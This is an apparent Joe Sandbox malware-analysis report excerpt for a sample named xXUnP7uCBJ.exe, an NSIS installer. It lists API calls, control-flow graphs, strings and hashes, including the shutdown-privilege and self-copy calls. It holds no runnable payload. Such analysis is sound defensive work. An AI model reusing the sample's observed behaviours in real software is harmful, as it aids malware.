                                                                                                              • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                              • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                              • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                              • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                              • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                              • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\xXUnP7uCBJ.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                              • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                              • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                              • String ID: .tmp$1033$C:\Users\user\AppData\Local\Iw\Antndelsens$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\xXUnP7uCBJ.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                              • API String ID: 3441113951-3702708986
                                                                                                              • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                              • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                              • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                              • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 153 40514f-405156 148->153 156 405080-405087 149->156 157 405073-40507a 149->157 154 404ed9 150->154 155 404edc-404ef9 call 40640a SendMessageW * 2 150->155 151->147 152 404f01-404f2d call 40435f * 2 151->152 195 404f33-404f39 152->195 196 404ff8-40500b GetWindowLongW SetWindowLongW 152->196 159 4051c7-4051cf 153->159 160 405158-40515e 153->160 154->155 155->151 162 405089-40508c 156->162 163 4050fc-4050ff 156->163 157->153 157->156 170 4051d1-4051d7 SendMessageW 159->170 171 4051d9-4051e0 159->171 167 405164-40516e 160->167 168 4053af-4053c1 call 4043c6 160->168 164 405097-4050ac call 404d1a 162->164 165 40508e-405095 162->165 163->153 169 405101-40510b 163->169 164->163 194 4050ae-4050bf 164->194 165->163 165->164 167->168 177 405174-405183 SendMessageW 167->177 179 40511b-405125 169->179 180 40510d-405119 SendMessageW 169->180 170->171 173 4051e2-4051e9 171->173 174 405214-40521b 171->174 182 4051f2-4051f9 173->182 183 4051eb-4051ec ImageList_Destroy 173->183 186 405371-405378 174->186 187 405221-40522d call 4011ef 174->187 177->168 188 405189-40519a SendMessageW 177->188 179->153 181 405127-405131 179->181 180->179 190 405142-40514c 181->190 191 405133-405140 181->191 192 405202-40520e 182->192 193 4051fb-4051fc GlobalFree 182->193 183->182 186->168 200 40537a-405381 186->200 213 40523d-405240 187->213 214 40522f-405232 187->214 198 4051a4-4051a6 188->198 199 40519c-4051a2 188->199 190->153 191->153 192->174 193->192 194->163 202 4050c1-4050c3 194->202 203 404f3c-404f43 195->203 201 405011-405015 196->201 205 4051a7-4051c0 call 401299 SendMessageW 198->205 199->198 199->205 200->168 206 405383-4053ad ShowWindow GetDlgItem ShowWindow 200->206 207 405017-40502a ShowWindow call 404394 201->207 208 40502f-405037 call 404394 201->208 209 4050c5-4050cc 202->209 210 4050d6 202->210 211 404fd9-404fec 203->211 212 404f49-404f71 203->212 205->159 206->168 207->168 208->140 218 4050d2-4050d4 209->218 219 4050ce-4050d0 209->219 222 4050d9-4050f5 call 40117d 210->222 211->203 226 404ff2-404ff6 211->226 220 404f73-404fa9 SendMessageW 212->220 221 404fab-404fad 212->221 227 405281-4052a5 call 4011ef 213->227 228 405242-40525b call 4012e2 call 401299 213->228 223 405234 214->223 224 405235-405238 call 404d9a 214->224 218->222 219->222 220->211 229 404fc0-404fd6 SendMessageW 221->229 230 404faf-404fbe SendMessageW 221->230 222->163 223->224 224->213 226->196 226->201 241 405347-40535b InvalidateRect 227->241 242 4052ab 227->242 247 40526b-40527a SendMessageW 228->247 248 40525d-405263 228->248 229->211 230->211 241->186 244 40535d-40536c call 404ced call 404cd5 241->244 245 4052ae-4052b9 242->245 244->186 249 4052bb-4052ca 245->249 250 40532f-405341 245->250 247->227 251 405265 248->251 252 405266-405269 248->252 254 4052cc-4052d9 249->254 255 4052dd-4052e0 249->255 250->241 250->245 251->252 252->247 252->248 254->255 256 4052e2-4052e5 255->256 257 4052e7-4052f0 255->257 259 4052f5-40532d SendMessageW * 2 256->259 257->259 260 4052f2 257->260 259->250 260->259
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                              • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                              • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                              • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N
                                                                                                              • API String ID: 1638840714-813528018
                                                                                                              • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                              • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                              • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                              • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                              APIs
                                                                                                                • Part of subcall function 701A121B: GlobalAlloc.KERNEL32(00000040,?,701A123B,?,701A12DF,00000019,701A11BE,-000000A0), ref: 701A1225
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 701A1C6B
                                                                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 701A1CB3
                                                                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 701A1CBD
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701A1CD0
                                                                                                              • GlobalFree.KERNEL32(?), ref: 701A1DB2
                                                                                                              • GlobalFree.KERNEL32(?), ref: 701A1DB7
                                                                                                              • GlobalFree.KERNEL32(?), ref: 701A1DBC
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701A1FA6
                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 701A2140
                                                                                                              • GetModuleHandleW.KERNEL32(00000008), ref: 701A21B5
                                                                                                              • LoadLibraryW.KERNEL32(00000008), ref: 701A21C6
                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 701A2220
                                                                                                              • lstrlenW.KERNEL32(00000808), ref: 701A223A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2259069122.00000000701A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701A0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2259033794.00000000701A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259096559.00000000701A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259132821.00000000701A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701a0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 245916457-0
                                                                                                              • Opcode ID: 5b8aae87246c924c9357efdebeaf35f86daaee1b1e8cc5cb2c148f254c4e5cc0
                                                                                                              • Instruction ID: 1cc0db256a3a72727785f309995790f80b7bcdb365fb998a3d0c90094c293c43
                                                                                                              • Opcode Fuzzy Hash: 5b8aae87246c924c9357efdebeaf35f86daaee1b1e8cc5cb2c148f254c4e5cc0
                                                                                                              • Instruction Fuzzy Hash: DD22CCF9C00246DFCB22CFA8C9846EEB7F5FB04315F22456EE1A6E7684D7705A809B50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 787 405afa-405b20 call 405dc5 790 405b22-405b34 DeleteFileW 787->790 791 405b39-405b40 787->791 792 405cb6-405cba 790->792 793 405b42-405b44 791->793 794 405b53-405b63 call 4063e8 791->794 795 405c64-405c69 793->795 796 405b4a-405b4d 793->796 800 405b72-405b73 call 405d09 794->800 801 405b65-405b70 lstrcatW 794->801 795->792 799 405c6b-405c6e 795->799 796->794 796->795 802 405c70-405c76 799->802 803 405c78-405c80 call 40672b 799->803 804 405b78-405b7c 800->804 801->804 802->792 803->792 810 405c82-405c96 call 405cbd call 405ab2 803->810 807 405b88-405b8e lstrcatW 804->807 808 405b7e-405b86 804->808 811 405b93-405baf lstrlenW FindFirstFileW 807->811 808->807 808->811 827 405c98-405c9b 810->827 828 405cae-405cb1 call 405450 810->828 813 405bb5-405bbd 811->813 814 405c59-405c5d 811->814 815 405bdd-405bf1 call 4063e8 813->815 816 405bbf-405bc7 813->816 814->795 818 405c5f 814->818 829 405bf3-405bfb 815->829 830 405c08-405c13 call 405ab2 815->830 819 405bc9-405bd1 816->819 820 405c3c-405c4c FindNextFileW 816->820 818->795 819->815 823 405bd3-405bdb 819->823 820->813 826 405c52-405c53 FindClose 820->826 823->815 823->820 826->814 827->802 831 405c9d-405cac call 405450 call 4061ae 827->831 828->792 829->820 832 405bfd-405c06 call 405afa 829->832 840 405c34-405c37 call 405450 830->840 841 405c15-405c18 830->841 831->792 832->820 840->820 844 405c1a-405c2a call 405450 call 4061ae 841->844 845 405c2c-405c32 841->845 844->820 845->820
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B23
                                                                                                              • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B6B
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B8E
                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B94
                                                                                                              • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405BA4
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                              • String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                              • API String ID: 2035342205-1432729950
                                                                                                              • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                              • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                              • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                              • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                              • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00406736
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID: xgB
                                                                                                              • API String ID: 2295610775-399326502
                                                                                                              • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                              • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 264 404037-40404c 262->264 265 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->265 263->262 266 403eaa-403eb3 263->266 270 40408c-404091 call 4043ab 264->270 271 40404e-404051 264->271 265->264 267 403eb5-403ec2 SetWindowPos 266->267 268 403ec8-403ecb 266->268 267->268 272 403ee5-403eeb 268->272 273 403ecd-403edf ShowWindow 268->273 283 404096-4040b1 270->283 275 404053-40405e call 401389 271->275 276 404084-404086 271->276 278 403f07-403f0a 272->278 279 403eed-403f02 DestroyWindow 272->279 273->272 275->276 298 404060-40407f SendMessageW 275->298 276->270 282 40432c 276->282 289 403f0c-403f18 SetWindowLongW 278->289 290 403f1d-403f23 278->290 286 404309-40430f 279->286 288 40432e-404335 282->288 284 4040b3-4040b5 call 40140b 283->284 285 4040ba-4040c0 283->285 284->285 294 4040c6-4040d1 285->294 295 4042ea-404303 DestroyWindow EndDialog 285->295 286->282 293 404311-404317 286->293 289->288 296 403fc6-403fd4 call 4043c6 290->296 297 403f29-403f3a GetDlgItem 290->297 293->282 299 404319-404322 ShowWindow 293->299 294->295 300 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 294->300 295->286 296->288 301 403f59-403f5c 297->301 302 403f3c-403f53 SendMessageW IsWindowEnabled 297->302 298->288 299->282 331 404126-40412b 300->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 300->332 305 403f61-403f64 301->305 306 403f5e-403f5f 301->306 302->282 302->301 310 403f72-403f77 305->310 311 403f66-403f6c 305->311 309 403f8f-403f94 call 404338 306->309 309->296 312 403f79-403f7f 310->312 313 403fad-403fc0 SendMessageW 310->313 311->313 316 403f6e-403f70 311->316 317 403f81-403f87 call 40140b 312->317 318 403f96-403f9f call 40140b 312->318 313->296 316->309 327 403f8d 317->327 318->296 328 403fa1-403fab 318->328 327->309 328->327 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->283 351 4041ff-404201 340->351 351->283 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->286 356 404244-404271 CreateDialogParamW 353->356 354->282 355 404219-40421f 354->355 355->283 357 404225 355->357 356->286 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->286
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                              • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                              • DestroyWindow.USER32 ref: 00403EF3
                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                              • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                              • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
